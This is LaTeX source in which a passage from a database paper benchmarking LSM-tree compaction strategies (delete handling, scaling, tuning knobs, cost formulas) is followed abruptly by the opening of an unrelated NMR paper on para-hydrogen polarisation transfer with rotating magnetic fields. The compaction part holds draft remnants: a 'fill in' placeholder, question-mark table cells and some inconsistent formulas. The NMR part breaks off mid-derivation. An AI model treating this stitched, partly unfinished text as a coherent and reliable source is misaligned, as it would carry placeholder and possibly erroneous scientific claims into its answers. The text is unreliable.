\Paragraph{The Point Lookup Latency Stabilizes with the Level Count}
Fig. \ref{fig:W7}(d) shows that as the update-to-insert ratio increases, the mean point lookup latency decreases sharply before stabilizing.
The initial sharp fall in the latency is attributed to a decrement in the number of levels (from $4$ to $3$) in the LSM-tree, when the update-to-insert ratio increases from $0.4$ to $1$.
The latency then stabilizes because non-empty point lookups perform at least one disk I/O, which, in turn, dominates the overall lookup cost.
\vspace{1mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{Tiering dominates the performance for update-intensive workloads}} \textit{When subject to update-intensive workloads, \texttt{Tier} exhibits superior compaction performance along with comparable lookup performance (as leveled LSMs), which allows it to dominate the overall performance space.}
}%
\normalsize
}
\vspace{1mm}
\subsubsection{\textbf{Varying Delete Proportion}}
We now analyze the impact of deletes, which manifest as out-of-place
invalidations with special entries called tombstones \cite{Sarkar2020}.
We keep the same data size and vary the proportion of point
deletes in the workload. All deletes are issued on existing keys and are
interleaved with the inserts.
\Paragraph{\texttt{TSD} and \texttt{TSA} Offer Superior Delete Performance}
We quantify the efficacy of deletion using the number of tombstones at the end
of the workload execution.
The lower this number, the faster deleted data has
been purged from the database, which in turn reduces space, write, and read
amplification.
Fig. \ref{fig:W7}(e) shows that \texttt{TSD} and \texttt{TSA} maintain the fewer tombstones at the end of the experiment.
For a workload with $10\%$ deletes, \texttt{TSD} purges $16\%$ more tombstones than \texttt{Tier} and $5\%$ more tombstones than \texttt{LO+1} by picking the files that have a tombstone density above a pre-set threshold for compaction.
For \texttt{TSA}, we experiment with two different thresholds for delete persistence: \texttt{TSA}$_{33}$ and \texttt{TSA}$_{50}$ is set to $33\%$ and $50\%$ of the experiment run-time, respectively.
As \texttt{TSA} guarantees persistent deletes within the thresholds set, it compacts more data aggressively, and ends up with $7$--$10\%$ fewer tombstones as compared to \texttt{TSD}.
\texttt{Full} manages to purge more tombstones than any partial compaction routine, as it periodically compacts entire levels.
\texttt{Tier} retains the highest number of tombstones as it maintains the highest number of sorted runs overall.
As the proportion of deletes in the workload increases, the number of tombstones remaining the LSM-tree (after the experiment is over) increases.
\texttt{TSA} and \texttt{TSD} along with \texttt{Full} scale better than the partial compaction routines and tiering.
By compacting more tombstones, \texttt{TSA} and \texttt{TSD} also purge more invalid data reducing space amplification, as shown in Fig. \ref{fig:W7}(f).
\Paragraph{\Ob Optimizing for Deletes Comes at a (Write) Cost}
The reduced space amplification offered by \texttt{TSA} and \texttt{TSD} is achieved by compacting the tombstones eagerly, which increases the overall amount of data moved due to compaction.
Fig. \ref{fig:W7}(g) shows that \texttt{TSD} and \texttt{TSA}$_{50}$ compacts
$18\%$ more data than the write optimized \texttt{LO+1} (for \texttt{TSA}$_{33}$ this becomes $35\%$).
Thus, \texttt{TSD} and \texttt{TSA} are useful when the objective is to (i) persist deletes timely or (ii) reduce space amplification caused by deletes.
\vspace{1mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{\texttt{TSD} and \texttt{TSA} are tailored for deletes}} \textit{\texttt{TSA} and \texttt{TSD}, by design, choose files with tombstones for compactions to reduce space amplification. \texttt{TSA} ensures timely persistent deletion by compacting more data eagerly for smaller persistence thresholds, which increases the write amplification.}
}%
\normalsize
}
\vspace{1mm}
\subsubsection{\textbf{Varying the Ingestion Count}}
We now report the scalability results by varying the data size from $2^{27}$B to $2^{35}$B.
\Paragraph{\Ob \texttt{Tier} Scales Poorly Compared to Leveled and Hybrid Strategies}
The mean compaction latency scales sub-linearly for all compaction strategies barring \texttt{Tier}, as shown in Fig. \ref{fig:W7}(h).
\textit{The relative advantages of compaction strategies with leveled and hybrid data layouts remain similar regardless of the data size.}
This observation is further backed up by Fig. \ref{fig:W7}(i) which shows how write amplification scales.
We also observe that the advantages of the RocksDB-implementation of tiering (i.e., \textit{universal compaction})~\cite{RocksDB2020} diminishes as the data size grows beyond $8$GB.
Fig.~\ref{fig:W7}(j) shows that as the data size increases, the tail compaction latency for \texttt{Tier} increases, as the worst-case overlap between files from consecutive levels increase significantly.
This makes \texttt{Tier} unsuitable for latency-sensitive applications.
When the data size reaches $2$GB, \texttt{Full} triggers a \textit{cascading compaction} that writes all data to a new level, causing spikes in write amplification and compaction latency.
\subsubsection{\textbf{Varying Entry Size}}
Here, we keep the key size constant ($4$B) and vary the value from $4$B to
$1020$B to vary the entry size.
\Paragraph{\Ob For Smaller Entry Size, Leveling Compactions are More Expensive}
Smaller entry size increases the number of
entries per page, which in turn, leads to (i) more keys to be compared during
merge and (ii) bigger Bloom filters that require more space per file and more CPU for hashing.
Fig. \ref{fig:W7}(k) shows these trends. We also observe similar
trends for write amplification in Fig. \ref{fig:W7}(l) and for query latency.
They both decrease as the entry size increases.
However, as the overall data size increases with the entry size, we observe the compaction latency and write amplification to increase steeply for \texttt{Tier} (similarly to Fig. \ref{fig:W7}(h) and (i)).
\subsection{LSM Tuning Influence}
\label{subsec:tuning}
In the final part of our analysis, we discuss the interplay of
compactions with the standard LSM tunings knobs, such as memory buffer size, page size, and size ratio.
\Paragraph{\Ob Compactions with Tiering Scale Better with Buffer Size}
Fig. \ref{fig:W7}(m) shows that as the buffer size increases, the mean compaction latency increases across all compaction strategies.
The size of buffer dictates the size of the files on disk, and
larger file size leads to more data being moved per compaction.
Also, for larger file size, the filter size per file increases along with the time spent for hashing, which increases compaction latency.
Further, as the buffer size increases, the mean compaction latency for \texttt{Tier} scales better than the other strategies.
Fig. \ref{fig:W7}(n) shows that the high tail compaction latency for \texttt{Tier} plateaus quickly as the buffer size increases, and eventually crossovers with that for the eagerer compaction strategies when the buffer size becomes $64$MB.
We also observe in Fig. \ref{fig:W7}(o) that among the partial compaction routines \texttt{Old} experiences an increased write amplification throughout, while \texttt{LO+1} and \texttt{LO+2} consistently offer lower write amplification and guarantee predictable ingestion performance.
Fig. \ref{fig:W7}(p) shows that as the memory buffer size increases, the mean point lookup latency increases superlinearly.
This is because, for larger memory buffers, the files on disk hold a greater number of pages, and thereby, more entries.
Thus, the combined size of the index block (one index per page) and filter block (typically, $10$ bits per entry) per file grows proportionally with the memory buffer size.
The time elapsed in fetching the index and filter blocks causes the mean latency for point lookups to increase significantly.
\Paragraph{All Compaction Strategies React Similarly to Varying the Page Size}
In this experiment, we vary the logical page size, which in turn, changes the number of entries per page.
The smaller the page size, the larger the number of pages per file -- meaning more I/Os are required to access a file on the disk.
For example, when the page size shrinks from $2^{10}$B to $2^9$B, the number of pages per file doubles.
With smaller page size, the index block size per file increases as more pages should be indexed, which also contributes to the increasing I/Os.
Thus, an increase in the logical page size, reduces the mean compaction latency, as shown in Fig.~\ref{fig:W7}(q).
In Fig.~\ref{fig:W7}(r), we observe that as the page size increases, the size of the index block per file decreases, and on average fewer I/Os are performed to fetch the metadata block overall for every point lookup.
\Paragraph{Miscellaneous Observations}
We also vary LSM tuning parameters such as the size ratio, the memory allocated
to Bloom filters, and the size of the block cache.
We observe that changing the values of these knobs
affects the different compaction strategies similarly, and
hence, does not influence the choice of the appropriate
compaction strategy for any particular set up.
\section*{Acknowledgment}
We thank the reviewers for their valuable feedback.
We are particularly thankful to Guanting Chen for his contributions in the early stages of this project.
This work was partially funded by National Science Foundation under Grant No. IIS-1850202 and a Facebook Faculty Research Award.
\subsection*{4.1* Compaction Eagerness}
Below, we discuss how the performance of an LSM-based storage engine is affected by the compaction eagerness.
\Paragraph{Leveling} A leveled LSM-tree eagerly merges the overlapping sorted runs every time a level is saturated and affects the performance the storage engine as follows.
\textit{Write amplification}: In a leveled LSM-tree, every time a Level $i$ reaches its capacity, all (or a subset of) files from Level $i$ are compacted with all (or the overlapping) the files from Level $i+1$; thus, on average each entry is written $T$ times within a level which leads to an average-case write amplification of $\mathcal{O}(T \cdot L)$.
\textit{Write throughput}: A leveled LSM-tree performs compactions eagerly whenever the memory buffer is full or a disk level reaches a nominal capacity.
This triggers compactions frequently, which consumes the device bandwidth at a greater degree, and affects the write throughput adversely.
\textit{Point lookups}: For leveling, the average cost for a point lookup on an non-existing key is given as $\mathcal{O}(L \cdot e^{-BPK})$, and that on an existing key is $\mathcal{O}(1 + L \cdot e^{-BPK})$ as it must always perform at least one I/O to fetch the target key.
\textit{Range lookups}: Compaction eagerness controls the number of sorted runs in an LSM-tree, and therefore, influences the cost for range lookups.
The average cost for a long range lookup is given as $\mathcal{O}(\tfrac{s \cdot N}{B})$ for leveling, with $s$ being the average selectivity of the range queries.
For short range queries, the average cost is simply proportional to the number of sorted runs, and is given as $\mathcal{O}(L)$.
\textit{Space amplification}: In presence of only updates and no deletes in a workload, the worst-case space amplification in a leveled LSM-tree is $\mathcal{O}(1/T)$~\cite{Dayan2018}.
However, with the addition of deletes, the space amplification increases significantly, and is given as $\mathcal{O}(\tfrac{N}{1 - \lambda})$ for leveling, where $\lambda$ is ratio of the size of a tombstone and the average size of a key-value pair~\cite{Sarkar2020}.
The space amplification for hybrid designs lay between the two extremely, and depends heavily on the exact tree design.
\textit{Delete performance}: The average time taken to persistently delete an entry from a tree is given by $\mathcal{O}(\tfrac{T^{L-1} \cdot P \cdot B}{I})$ for leveling~\cite{Sarkar2020}, where $I$ denotes the rate of ingestion of unique entries to the database.
Note that, for leveling propelling the tombstone to the last level ensures persistent deletion of the target entry to guarantee delete persistence.
\Paragraph{Tiering}: A tiered LSM merger the sorted runs lazily and is optimized for writes.
\textit{Write amplification}: For a tiered LSM, each level may have up to $T$ sorted runs with overlapping key-ranges; thus, each entry is written at least once per level resulting in an average-case write amplification of $\mathcal{O}(L)$.
\textit{Write throughput}: For tiering, compactions are less frequent and with the device bandwidth mostly free of compaction traffic, the write throughput is significantly improved.
\textit{Point lookups}: The average point lookup cost for a tiered LSM is $\mathcal{O}(T \cdot L \cdot e^{-BPK})$ for lookups on an non-existing key, and $\mathcal{O}(1 + T \cdot L \cdot e^{-BPK})$ for existing keys.
\textit{Range lookups}: For tiering, the average cost for a long range lookup is given as $\mathcal{O}(\tfrac{T \cdot s \cdot N}{B})$, and that for short range lookups is $\mathcal{O}(T \cdot L)$ for tiering.
\textit{Space amplification}: The worst-case space amplification in a leveled LSM-tree is $\mathcal{O}(T)$~\cite{Dayan2018} for workloads with updates but no deletes; which increases to $\mathcal{O}(\tfrac{(1 - \lambda) \cdot N + 1}{\lambda \cdot T})$ in presence of deletes.
\textit{Delete performance}: The average latency for delete persistence for a tiered LSM is given by $\mathcal{O}(\tfrac{T^L \cdot P \cdot B}{I})$, as in case of tiering, the tombstone must participate in a compaction involving all the sorted runs from the last level to guarantee delete persistence.
\Paragraph{Hybrid Designs}: Hybrid LSM-designs are generalized by $l$-leveling which includes lazy leveling, RocksDB-style hybrid leveling with only the first level being tiered, and other LSM-variants proposed in \cite{Dayan2019} and \cite{Idreos2019}.
\textit{Write amplification}: An $l$-leveled LSM-tree has its last $l$ levels implemented as leveled with the remaining shallower $L-l$ levels as tiering; and thus, the average-case write amplification in an $l$-leveled tree is given as $\mathcal{O}(L-l) + \mathcal{O}(T \cdot l)$.
For lazy leveling, $l = 1$, which asymptotically makes the write amplification of the LSM-tree similar an tiered LSM; while for RocksDB-style hybrid leveling $l = L-1$ closely resembles the write amplification of a leveled LSM.
\textit{Write throughput}: The write throughput of hybrid LSM-designs fall in between that of leveling and tiering, and depends on the capacity of the number of leveling implemented as tiering or leveling.
\textit{Point lookups}: For a hybrid design, the average lookup cost for non-existing keys becomes \red{fill in}, and similarly for lookups on existing keys.
\textit{Range lookups}: For hybrid designs, the cost for range lookups fall in between that for leveling and tiering, and depends on the exact design of the tree.
\textit{Space amplification}: The space amplification for hybrid designs lay between the two extremely, and depends heavily on the exact tree design.
\textit{Delete performance}: The hybrid designs, the latency to persist deletes depends only on the implementation of the last level of the tree, i.e., if the last level is implemented as tiered, the said latency is same as a tiered LSM; otherwise, which is similar to a leveled LSM-tree.
\begin{table*}[t]
\centering
\resizebox{\textwidth}{!}{%
\begin{tabular}{l|l}
\toprule
\multirow{1}{*}{\textbf{Knobs}} & \textbf{Remark} \\
\midrule
\multirow{1}{*}{Size ratio} & \shortstack[l]{
\textit{Space-amplification}: Larger size ratio → fewer levels → reduce space-amp \\
\textit{Write-amplification}: Larger size ratio → more times that an entry averagely gets merged → increase write amplification. \\
\textit{Update cost}: Larger size ratio → more times that an update entry averagely gets merged till it consolidates → more average worst-case update cost \\
\textit{Read cost}: Larger size ratio → fewer levels → fewer expected lookup cost O(L). \\
\textit{Individual compaction bytes}: Larger size ratio → more entries to be copied during a compaction → more total compaction bytes. \\
\textit{*Update throughput}: ? \\
\textit{Modeling graph: https://www.desmos.com/calculator/q4ko9j1wmp}
} \\
\midrule
\multirow{1}{*}{Memory buffer} & \shortstack[l]{
\textit{Space-amplification}: Larger memory buffer → fewer levels → reduce space-amp in general and can be slightly optimized for skewed workloads. \\
\textit{Write-amplification}: Larger memory buffer → every entry participates in averagely the same number of compaction in total → No changes. \\
\textit{Update cost}: Larger memory buffer → fewer levels → an updating entry participates in a fewer numbers of compactions in total to consolidate → less average worst-case update cost \\
\textit{Read cost}: Larger memory buffer → fewer levels → fewer expected lookup cost O(L). \\
\textit{Individual compaction bytes}: Larger memory buffer → Larger file size → more entries to be copied during a compaction → more individual compaction bytes. \\
\textit{*Read throughput}: ? \\
\textit{*Update throughput}: ? \\
\textit{Modeling graph: https://www.desmos.com/calculator/udmwdg5dt1}
} \\
\midrule
\multirow{1}{*}{File size} & \shortstack[l]{
\textit{Space-amplification}: No changes. \\
\textit{Write-amplification}: No changes. \\
\textit{Update cost}: No changes. \\
\textit{Read cost}: No changes. \\
\textit{Individual compaction bytes}: Larger file size → more entries to be copied during a compaction → more individual compaction bytes \\
\textit{*Read throughput}: ? \\
\textit{*Update throughput}: ? \\
\textit{Others}:
} \\
\midrule
\multirow{1}{*}{Bloom filters} & \shortstack[l]{
\textit{Space-amplification}: Larger bytes per key → increase space-amplification. \\
\textit{Write-amplification}: No changes. \\
\textit{Update cost}: No changes. \\
\textit{Read cost}: Larger bytes per key → assume more memory allocated to Bloom filter → fewer read cost O(L) \\
\textit{Individual compaction bytes}: Larger bytes per key → more bytes written in individual compactions. \\
\textit{*Read throughput}: ? \\
\textit{*Update throughput}: ? \\
\textit{Others}:
} \\
\midrule
\multirow{1}{*}{Block cache} & \shortstack[l]{
\textit{Space-amplification}: No changes. \\
\textit{Write-amplification}: No changes. \\
\textit{Update cost}: No changes. \\
\textit{Read cost}: Cache indexes, filters, data blocks for reads → significantly better read performance. \\
\textit{Read throughput}: Directly read from memory → significantly larger read throughput. \\
\textit{Individual compaction bytes}: No changes.\\
\textit{*Update throughput}: ? \\
\textit{Others}: Reads are more optimized for skewed workloads.
} \\
\midrule
\multirow{1}{*}{Threads} & \shortstack[l]{
\textit{Space-amplification}: No changes. \\
\textit{Write-amplification}: No changes. \\
\textit{Update cost}: No changes. \\
\textit{Read cost}: Shorten compaction duration → Timely reclamation that can potentially reduce read amplification if a bunch of reads is right after multi-level-compactions that are triggered by intensive updates. \\
\textit{Individual compaction bytes}: No changes. \\
\textit{Read throughput}: Shorten compaction duration → increase read throughput for interleaved workloads.\\
\textit{Update throughput}: Shorten compaction duration → increase overall write throughput. \\
\textit{*Others}: Shorten compaction duration → consolidate duplicate and discarded entries timely → reduce read amplification and lookup cost → and better space amplification?
} \\
\midrule
\multirow{1}{*}{File size multiplier} & \shortstack[l]{
\textit{Space-amplification}: No changes. \\
\textit{Write-amplification}: Larger file size multiplier → larger level contributes to a larger number of entries copied during a compaction with the same compaction frequency → increase write-amplification. \\
\textit{Update cost}: Larger file size multiplier → larger level contributes to a larger number of entries copied during a compaction with the same compaction frequency → more update cost. \\
\textit{Read cost}: No changes. \\
\textit{Individual compaction bytes}: Larger file size multiplier → larger level has larger compaction bytes but with the same compaction frequency. \\
\textit{Read throughput}: No changes. \\
\textit{Update throughput}: Shorten compaction duration → increase overall write throughput. \\
\textit{Others}:
} \\
\midrule
\multirow{1}{*}{Level$_0$ compaction trigger} & \shortstack[l]{
\textit{Space-amplification}: More Level$_0$ files → increase space-amplification. \\
\textit{Write-amplification}: Level$_0$ self compactions → increase write-amplification. \\
\textit{Update cost}: More Level$_0$ files → more times of compactions to consolidates a existing entry. \\
\textit{Read cost}: More Level$_0$ files → increase space-amplification and read amplification → higher read cost. \\
\textit{Individual compaction bytes}: More compaction bytes between Level$_0$ and Level$_1$ compactions.\\
\textit{Update throughput}: More Level$_0$ files → increase insert/update throughput. \\
\textit{*Read throughput}: ? \\
\textit{Others}:
} \\
\midrule
\multirow{1}{*}{Max compaction bytes} & \shortstack[l]{
\textit{Space-amplification}: If too small, redundant entries might not be compacted in a timely manner → increase space-amplification. \\
\textit{*Write-amplification}: ? \\
\textit{*Update cost}: ? \\
\textit{Read cost}: If too small, redundant entries might not be reclaimed in time → increase read cost. \\
\textit{*Read throughput}: ? \\
\textit{Individual compaction bytes}: No changes.\\
\textit{Update throughput}: If too small, further compactions needed to be done → reduce update throughput. \\
\textit{Others}:
} \\
\midrule
\multirow{1}{*}{Compaction readahead size} & \shortstack[l]{
\textit{Space-amplification}: No changes. \\
\textit{Write-amplification}: No changes. \\
\textit{Update cost}: No changes. \\
\textit{Read cost}: Perform bigger reads when doing compactions → increase read amplification and read cost. \\
\textit{*Read throughput}: ? \\
\textit{Individual compaction bytes}: No changes.\\
\textit{Update throughput}: No changes. \\
\textit{Others}:
} \\
\bottomrule
\end{tabular}
}
\caption{LSM-Tree compaction tuning knobs. \label{tab:cost}}
\vspace{-0.2in}
\end{table*}
\section{Introduction}
\label{sec:introduction}
\input{1-introduction}
\section{Background}
\label{sec:background}
\input{2-background}
\section{The Compaction Design Space}
\label{sec:compaction}
\input{3-compaction}
\section{Benchmarking Compactions}
\label{sec:methodology}
\input{4-methodology}
\section{Experimental Evaluation}
\label{sec:results}
\input{5-results}
\input{5-results_temp}
\section{Discussion}
\label{sec:tuning}
\input{6-tuning}
\section{Conclusions}
\label{sec:conclusion}
\input{8-conclusion}
\balance
{
\input{biblio}
}
\ifx\mode\undefined
| 2024-02-18T23:40:02.567Z | 2022-03-01T02:17:58.000Z | algebraic_stack_train_0000 | 1,162 | 17,375 |
|
proofpile-arXiv_065-5740 |
\section*{}
\vspace{-1cm}
\footnotetext{\textit{School of Chemistry, Highfield Campus, Southampton, United Kingdom, SO171BJ. E-mail: l.dagys@soton.ac.uk}}
\section{Introduction}
\label{sec:introduction}
The inherently low sensitivity of Nuclear Magnetic Resonance (NMR) may be greatly overcome through the use of hyperpolarization methods~\cite{natterer_parahydrogen_1997, bowers_parahydrogen_1987,ardenkjaer-larsen_increase_2003,maly_dynamic_2008,walker_spin-exchange_1997,kovtunov_hyperpolarized_2018, emondts_polarization_2017,stephan_13c_2002,adams_reversible_2009,johannesson_transfer_2004,theis_light-sabre_2014,theis_microtesla_2015,cavallari_effects_2015,eills_polarization_2019,bengs_robust_2020,devience_homonuclear_nodate,rodin_constant-adiabaticity_2021-1,rodin_constant-adiabaticity_2021,knecht_rapid_2021,dagys_low-frequency_2021,dagys_nuclear_2021}. At the core of these methods is the production of nuclear spin order far from thermal equilibrium that can lead to signal enhancements of many orders of magnitude.
Particular promising techniques are \emph{para}\xspace-hydrogen induced polarisation (PHIP) methods~\cite{natterer_parahydrogen_1997,bowers_parahydrogen_1987,emondts_polarization_2017,stephan_13c_2002,adams_reversible_2009,johannesson_transfer_2004,theis_light-sabre_2014,theis_microtesla_2015,cavallari_effects_2015,eills_polarization_2019,bengs_robust_2020,devience_homonuclear_nodate,rodin_constant-adiabaticity_2021-1,rodin_constant-adiabaticity_2021,knecht_rapid_2021,dagys_low-frequency_2021,dagys_nuclear_2021}. Methods of this type utilise molecular hydrogen gas enriched in its \emph{para}\xspace-spin isomer, typically achieved by passing the cooled gas over an iron oxide catalyst~\cite{bowers_parahydrogen_1987,natterer_parahydrogen_1997}.
For the case of hydrogenative-PHIP (considered here) the \emph{para}\xspace-enriched hydrogen gas (\emph{para}\xspace-hydrogen) is allowed to react with a suitable precursor molecule. Upon hydrogenation the nuclear singlet order of the hydrogen gas is carried over to the product molecule. However, the resulting nuclear singlet order located on the product molecule is NMR silent. Efficient conversion of nuclear singlet order into observable magnetization is thus an integral part of the method.
A number of techniques already exist for this purpose, both at high and low magnetic fields~\cite{johannesson_transfer_2004,theis_light-sabre_2014,theis_microtesla_2015,cavallari_effects_2015,eills_polarization_2019,bengs_robust_2020,devience_homonuclear_nodate,rodin_constant-adiabaticity_2021-1,rodin_constant-adiabaticity_2021,knecht_rapid_2021,dagys_low-frequency_2021,dagys_nuclear_2021}. High field methods benefit from the usual advantages, spectral separation between hetero- and homonuclei, strong pulse schemes with error compensation and applicability to a broad class of molecular systems~\cite{devience_preparation_2013,pravdivtsev_highly_2014,bengs_robust_2020,dagys_nuclear_2021,theis_light-sabre_2014,haake_efficient_1996}. However, these benefits often come at a price. Some technical challenges may arise due to additional relaxation phenomena and coherent leakage, which may lead to significant polarization losses~\cite{rodin_constant-adiabaticity_2021-1,knecht_mechanism_2018, knecht_indirect_2019}.
Some of these issues may be circumvented at low magnetic fields~\cite{johannesson_transfer_2004,cavallari_effects_2015,eills_polarization_2019,rodin_constant-adiabaticity_2021,rodin_constant-adiabaticity_2021-1,knecht_rapid_2021}. This has been utilised to produce large quantities of chemically pure and hyperpolarized (1-\ensuremath{{}^{13}\mathrm{C}}\xspace)fumarate, for example~\cite{knecht_rapid_2021}. The reaction was carried out inside a pressurised metal reactor, which itself was placed inside a magnetic shield. The polarization transfer was performed by sweeping the magnetic field in the sub-microtesla regime. Such a setup would be impossible at high magnetic fields as the reaction vessel is incompatible with pulsed radio-frequency methods.
We have recently demonstrated that efficient polarisation transfer may also be performed in the presence of a weak static magnetic field superimposed with a weak oscillating low field (WOLF) along the same direction~\cite{dagys_low-frequency_2021}. A magnetic field geometry with the oscillating field applied along the same direction as the main magnetic field is unusual for NMR, indeed if the oscillating field is applied in the conventional transverse plane the WOLF pulse becomes ineffective.
Generally speaking, the description of oscillating fields in the low magnetic field regime is complicated. In contrast to high field experiments both the resonant part and the counter-rotating part of the linearly polarised field have to be considered~\cite{meriles_high-resolution_2004, sakellariou_nmr_2005}. However, \blue{at low magnetic fields it is technically trivial} to generate rotating magnetic fields that are resonant with the nuclear spin transition frequencies. This way perturbations due to the counter-rotating components are simply avoided.
In this work we demonstrate that the application of transverse rotating fields may be exploited for the polarisation transfer step in PHIP experiments. The application of a suitable STORM (Singlet-Triplet Oscillations through Rotating Magnetic fields) pulse enables polarisation transfer from the singlet pair to a heteronucleus leading to substantially enhanced NMR signals. We validate some of these concepts experimentally by generating hyperpolarized (1-\ensuremath{{}^{13}\mathrm{C}}\xspace)fumarate, and explore the STORM condition as a function of the bias field, rotation frequency and sense of rotation.
We find that driving spin transitions with a rotating magnetic field in low magnetic fields requires unusually high rotation frequencies, sometimes several kHz. This is in contrast to typical zero-to-ultralow field experiments which involve frequencies on the order of several Hz at most~\cite{pileio_extremely_2009,sjolander_13c-decoupled_2017,sjolander_transition-selective_2016}. The observed polarization levels are comparable to other low-field techniques~\cite{rodin_constant-adiabaticity_2021,rodin_constant-adiabaticity_2021-1,knecht_rapid_2021,dagys_low-frequency_2021}. However, we provide numerical evidence that the STORM method greatly outperforms several existing techniques in the presence of fast relaxing quadrupolar nuclei, such as deuterium for example. The STORM method might therefore represent a simple solution to quadrupolar decoupled polarisation transfer at low magnetic fields~\cite{birchall_quantifying_2020,tayler_scalar_2019}.
\section{Theory}
\label{sec:theory}
Consider an ensemble of nuclear three-spin-1/2 systems consisting of two nuclei of isotopic type $I$ and a third nucleus of isotopic type $S$. The nuclei are characterised by the magnetogyric ratio's $\gamma_I$ and $\gamma_S$, respectively.
For an isotropic solution, the nuclei mutually interact by scalar spin-spin coupling terms
\begin{equation}
\begin{aligned}
H_{J} = H_{II}+H_{IS},
\end{aligned}
\end{equation}
where the Hamiltonian $H_{II}$ describes the homonuclear couplings
\begin{equation}
\begin{aligned}
H_{II}=2\pi J_{12}{\bf I}_1\cdot{\bf I}_2
\end{aligned}
\end{equation}
and the Hamiltonian $H_{IS}$ describes the heteronuclear couplings
\begin{equation}
\begin{aligned}
H_{IS}=
2\pi J_{13}{\bf I}_1\cdot{\bf S}
+2\pi J_{23}{\bf I}_2\cdot{\bf S}.
\end{aligned}
\end{equation}
For the remainder of the discussion we assume the coupling constants $J_{13}$ and $J_{23}$ to be different ($J_{13}\neq J_{23}$) and \blue{a positive homonuclear coupling constant $J_{12}$. The heteronuclear $J$ coupling Hamiltonian may be split} in its symmetric and anti-symmetric part
\begin{equation}
\begin{aligned}
H_{IS}=H^{\Sigma}_{IS}+H^{\Delta}_{IS},
\end{aligned}
\end{equation}
with
\begin{equation}
\begin{aligned}
&H^{\Sigma}_{IS}=\pi(J_{13}+J_{23})({\bf I}_1+{\bf I}_2)\cdot {\bf S},
\\
&H^{\Delta}_{IS}=\pi(J_{13}-J_{23})({\bf I}_1-{\bf I}_2)\cdot {\bf S}.
\end{aligned}
\end{equation}
\input{Figures/Energies}
The nuclear spin ensemble may further be manipulated by the application of external magnetic fields. The magnetic field Hamiltonian is constructed by coupling the spin angular momenta to the external magnetic field taking their respective magnetogyric ratio's into account
\begin{equation}
\begin{aligned}
H_{M}(t)=-\gamma_I {\bf B}(t)\cdot({\bf I}_{1}+{\bf I}_{2})-\gamma_S {\bf B}(t)\cdot{\bf S}.
\end{aligned}
\end{equation}
The total spin Hamiltonian is then given by
\begin{equation}
\begin{aligned}
H(t)=H_{J}+H_{M}(t).
\end{aligned}
\end{equation}
\subsection{Rotating field Hamiltonian}
\input{Figures/LACs}
Consider now the application of a time-dependent rotating magnetic field in the presence of a weak bias field along the laboratory frame $z$-axis. The $z$-bias Hamiltonian is given by
\begin{equation}
\begin{aligned}
H_{\rm bias}
&=-\gamma_I B_{\rm bias} (I_{1z}+I_{2z})-\gamma_S B_{\rm bias} S_{z}
\\
&=\omega^{I}_{0}(I_{1z}+I_{2z})+\omega^{S}_{0} S_{z},
\end{aligned}
\end{equation}
whereas the rotating magnetic field Hamiltonian is given by
\begin{equation}
\begin{aligned}
H_{\rm rot}(t)
=&B_{\rm rot} \cos(\omega_{\rm rot} t)(-\gamma_I (I_{1x}+I_{2x})-\gamma_S S_{x})
\\
-&B_{\rm rot} \sin(\omega_{\rm rot} t)(-\gamma_I (I_{1y}+I_{2y})-\gamma_S S_{y}).
\end{aligned}
\end{equation}
The total spin Hamiltonian may now be expressed as a combination of scalar-coupling terms, the bias term and the rotating field contribution
\begin{equation}
\begin{aligned}
H(t)=H_{J}+H_{M}(t)=H_{J}+H_{\rm bias}+H_{\rm rot}(t).
\end{aligned}
\end{equation}
It turns out to be advantageous to isolate the rotating part of $H(t)$. To this end we consider an interaction frame transformation rotating all three spins equally around the laboratory frame $z$-axis. The angular frequency is chosen to coincide with $\omega_{\rm rot}$
\begin{equation}
\begin{aligned}
K_{z}(t)=\exp\{-{i\mkern1mu} (I_{1z}+I_{2z}+S_{z})\omega_{\rm rot} t\}.
\end{aligned}
\end{equation}
The corresponding interaction frame Hamiltonian $\tilde{H}(t)$ is given by
\begin{equation}
\begin{aligned}
\tilde{H}=
&K_{z}(t)H(t)K_{z}(-t)+{i\mkern1mu} \dot{K}_{z}(t)K_{z}(-t)
\\
=&H_J+\omega^{I}_{1}(I_{1x}+I_{2x})+\omega^{S}_{1} S_{x}
\\
+&(\omega^{I}_{0}+\omega_{\rm rot})(I_{1z}+I_{2z})+(\omega^{S}_{0}+\omega_{\rm rot})S_{z},
\end{aligned}
\end{equation}
which has the advantage of being time-independent.
\subsection{Effective field Hamiltonian}
Within the interaction frame the spins evolve under a new effective magnetic field $B_{\rm eff}$. The coupling of the effective field to the $I$ and $S$ spins may be characterised by the effective nutation frequencies $\omega_{\rm eff}^{X}$
\begin{equation}
\label{eq:omega_eff}
\begin{aligned}
&\omega_{\rm eff}^{X}=\sqrt{(\omega^{X}_{0}+\omega_{\rm rot})^{2}+(\omega^{X}_{1})^{2}},
\end{aligned}
\end{equation}
and the polar angles $\theta_{\rm eff}^{X}$
\begin{equation}
\begin{aligned}
&\theta_{\rm eff}^{X}=\arctantwo(\omega^{X}_{0}+\omega_{\rm rot},\omega^{X}_{1}).
\end{aligned}
\end{equation}
The polar angles describe the field direction with respect to the laboratory frame $z$-axis. An alternative representation of $\tilde{H}$ is thus given by
\begin{equation}
\label{eq:H_tilde}
\begin{aligned}
\tilde{H}= XH_{\rm eff}X^{\dagger}+H^{\Delta}_{IS},
\end{aligned}
\end{equation}
where $H_{\rm eff}$ represents the effective field Hamiltonian in the absence of the anti-symmetric heteronuclear $J$-couplings
\begin{equation}
\label{eq:H_eff}
\begin{aligned}
H_{\rm eff}= \omega_{\rm eff}^{I}(I_{1z}+I_{2z})+\omega_{\rm eff}^{S}S_{z}+H_{II}+H^{\Sigma}_{IS}.
\end{aligned}
\end{equation}
The transformation $X$ is defined as a composite rotation of spins $I$ and $S$
\begin{equation}
\begin{aligned}
X=R^{12}_{y}(\theta_{\rm eff}^{I})R^{3}_{y}(\theta_{\rm eff}^{S}).
\end{aligned}
\end{equation}
Consider now the set of STZ states aligned along the effective magnetic field direction
\begin{equation}
\begin{aligned}
&\ket{T_{m}\mu^{'}}=X\ket{T_{m}\mu},
\\
&\ket{S_{0}\mu^{'}}=X\ket{S_{0}\mu}.
\end{aligned}
\end{equation}
These states are exact eigenstates of the effective field part of the interaction frame Hamiltonian
\begin{equation}
\begin{aligned}
XH_{\rm eff} X^{\dagger}\ket{T_{m}\mu^{'}}
=&XH_{\rm eff} X^{\dagger}X\ket{T_{m}\mu}
=\lambda X\ket{T_{m}\mu}
=\lambda\ket{T_{m}\mu^{'}},
\end{aligned}
\end{equation}
